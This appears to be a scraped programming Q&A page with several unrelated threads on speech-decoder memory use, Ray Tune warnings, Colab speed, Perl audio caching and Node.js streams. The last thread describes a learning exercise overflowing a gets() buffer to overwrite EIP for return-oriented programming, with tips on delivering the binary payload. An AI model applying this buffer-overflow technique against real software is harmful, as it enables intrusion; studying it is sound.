problem with CTCBeamDecoder.decode() when using a big (.arpa / .binary) file - pytorch

repo i'm using https://github.com/parlance/ctcdecode
i'm interested in using the kenlm LM to decode/score outputs of my speech recognition model.
when I initiate my CTCBeamDecoder with model_path='./test.arpa', which is a pretty small .arpa file just for testing, ~4kb, i encounter no problem and CTCBeamDecoder.decode() outputs with no issue at all.
but when I try using the correct .arpa file for my project ( 3-gram.pruned.1e-7.arpa.gz ) which is ~90mb, it either crashes instantly or takes forever and doesn't output anything. I built a .binary file for this .arpa file to use it , but I encounter the same problem.
I should also note that when I try loading the bigger.arpa file 3-gram.pruned.1e-7.arpa in the kenlm language model only (without the CTCdecoder) it loaded without any problems and I can use it to score sentences, but loading the .arpa file via CTCBeamDecoder to decode my SR model's output doesn't work.
is it simply because it requires a LOT of RAM to do inference with a big .arpa file ? (i got 8gb)
if it's the case how much ram i need to do inference with such file?

Related

Tune Hyperparameter in sklearn with ray

I wonder but could not found any information why this appears all the time if I try to tune hyperparameter from sklearn with TuneSearchCV:
Note that the important part is the Log sync warning and as a result that the logging in combination with tensorflow and search_optimization such as optuna does not work:
Backend is sklearn
Concatenating h5 datasets of the following files:
('output/example_train_1.h5', 'output/example_train_2.h5')
based on the following keys:
('x', 'y')
Concatenation successful, resulting shapes for the given dsets:
Key: x, shape: (20000, 25)
Key: y, shape: (20000,)
Log sync requires rsync to be installed.
Process finished with exit code 0
The tuning processes seem to be working, as long as I do not use search-optimization such as optional.
I use it within a docker container. I got through the ray-documentation, but I could find the source where I think the error drops. However, I could not find any settings or additional options on how to prevent it.
Furthermore, it seems that rsync is just necessary if I use a cluster. But actually, I don't do that right now.
The warning (Log sync requires rsync to be installed.) does not stop the script from executing. If rsync is not installed, it will just not synchronize logs between nodes, which seems to be unnecessary in your case anyway. You shouldn't run into any problem there.
It's hard to say what the problem here is, as we're missing crucial information: Which version of Ray are you running, which version of tune-sklearn, and how does your training script look like?
If you're running into problems and you suspect it is a bug, please consider opening an issue in the tune-sklearn repository, and make sure to include the above information and preferably a minimal reproducible script so the maintainers can look into this.

Running python script in colab very slow as compared to same code run on directly colab in notebook

Recently I was trying to test my model which i already trained. Initially I was using Google colab notebook to write code because of it's interactive features, once I was done writing code and I was getting satisfactory results, it took around 2.5 hr to give final output. After that what I wanted was to transfer the notebook code to .py script, I did that with little bit of modification, saved it in gdrive, and then used command !python test.py. now it took me more than 4.5 hr to get the final output, can any one explain why does colab take so much time when trying to run the python script from gdrive while compared to the same code as used in notebook
I would add time calculation to every step I doubt that takes time and see which step in your whole program takes the time.
a1 = time.time()
//your code step
print(time.time() - a1)
This will give you the time for each step and you can see which one is taking a long time.
Operations to check.
1. object creation in loops
2. read/write operation to Gdrive
Once you find the problem-causing piece of code, you may change it.
Well it can be because of the fact that colab is retrieving the data from gdrive and then might be again writing in gdrive which will of ofcourse take time i guess

How to cache files with Perl while playing sound files using vlc?

I would like to manually cache files in Perl, so when playing a sound there is little to no delay.
I wrote a program in Perl, which plays an audio file by doing a system call to VLC. When executing it, I noticed a delay before the audio started playing. The delay is usually between about 1.0 and 1.5 seconds. However, when I create a loop which does the same VLC call multiple times in a row, the delay is only about 0.2 - 0.3 seconds. I assume this is because the sound file was cached by Linux. I found Cache::Cache on CPAN, but I don't understand how it works. I'm interested in a solution without using a module. If that's not possible, I'd like to know how to use Cache::Cache properly.
(I know it's a bad idea to use a system call to VLC regarding execution speed)
use Time::HiRes;
use warnings;
use strict;
while (1) {
my $start = Time::HiRes::time();
system('vlc -Irc ./media/audio/noise.wav vlc://quit');
my $end = Time::HiRes::time();
my $duration = $end - $start;
print "duration = $duration\n";
<STDIN>;
}
Its not as easy as just "caching" a file in perl.
vlc or whatever program needs to interpret the content of the data (in your case the .wav file).
Either you stick with calling an external program and just give it a file to execute or you need to implement the whole stack in perl (and probably Perl XS Modules). By whole stack I mean:
1. Keeping the Data (your .wav file) in Memory (inside the perl runtime).
2. Interpreting the Data inside Perl.
The second part is where it gets tricky you would probably need to write a lot of code and/or use 3rd Party modules to get where you want.
So if you just want to make it work fast, stick with system calls. You could also look into Nama which might give you what you need.
From your Question it looks like you are mostly into getting the runtime of a .wav file. If its just about getting information about the File and not about playing the sound then maybe Audio::Wav could be the module for you.
Cacheing internal to Perl does not help you here.
Prime the Linux file cache by reading the file once, for example at program initialisation time. It might happen that at the time you want to play it, it has already been made stale and removed from the cache, so if you want to guarantee low access time, then put the files on a RAM disk instead.
Find and use a different media player with a lower footprint that does not load dozens of libraries in order to reduce start-up time. Try paplay from package pulseaudio-utils, or gst123, or mpg123 with mpg123-pulse.

Node.js read and write stream to the same file at the same time

TL;DR
I'm browsing through a number of solutions on npm and github looking for something that would allow me to read and write to the same file in two different places at the same time. So far I'm having trouble actually finding anything like this. Is there a module of some sort that will allow that?
Background
In essence my requirement is that in a large file I need to, in the following order:
read
transform
write
Ideally the usage would be something like:
const fd = fs.open(file, "r+");
const read = createReadStreamSomehowFrom(fd);
const write = createWriteStreamSomehowFrom(fd);
read
.pipe(new Transform(transform() {...}))
.pipe(write);
I could do that with standard fs.create[Read/Write]Stream but there's no way to control the flow of both streams and if my write position goes beyond read position then I'm reading something I just wrote...
The use case is the same as perl -p -i -e, read and write to the same file (meaning the same inode) asynchronously and replace the contents without loading everything into memory.
I would expect this a real world use case, yet all implementations I found actually load the whole file into memory and then save it. Am I missing a known module here or is there a need to actually write something like this?
Hmm... a tough one it seems. :)
So here's for the record - I found no such module and actually discussed this with some people responsible for a nice in-file replacing module. Seeing no way to solve this I decided to write it from scratch and here it is:
signicode/rw-stream repo on github
rw-stream at npm
The module works on a simple principle that no byte can be written until it has been consumed in the readable stream and it's fairly simple underneath (couple fs.read/write ops with keeping eye on the point of read and write).
If you find this useful then I'm happy. :)

Windows console application with gets() ROP exploit

I'm trying (for learning purposes) to take advantage of gets() function vulnerability using return-oriented programming (ROP) technique. The target program is a Windows console application that in some point asks for some input, and then uses gets() to store the input in the local 80 characters long array.
I created a file that contains 80 'a' characters in the beginning + some extra characters + 0x5da06c48 address for overwriting the old EIP pointer.
I'm opening the file in text editor and copy-pasting the content into the console as input. I've used IDA Pro (or OllyDbg) to set a breakpoint right after the return from the gets() function and noticed that the address was corrupted - it was set to 0x3fa03f48 (two 3f substitutions).
I've tried other addresses as well - part of them works well, but most of the times the address is being corrupted (sometimes characters missing or substituted, sometimes truncated).
How to get over this problem? Any suggestion will be highly appreciated!
Copy-Pasting binary data is hit-and-miss. Have you tried feeding the input into your test program directly from the file using input redirection?
First of all keep track of the Endianness of your platform. If you think your bits are in the right order but you are still getting malformed input, it might be that your shell/text editor isn't binary safe. You are better off writing an exploit for this flaw in a scripting language such as Python, using the Subprocess library which allows you to write data directly to an arbitrary process's stdin pipe.

Resources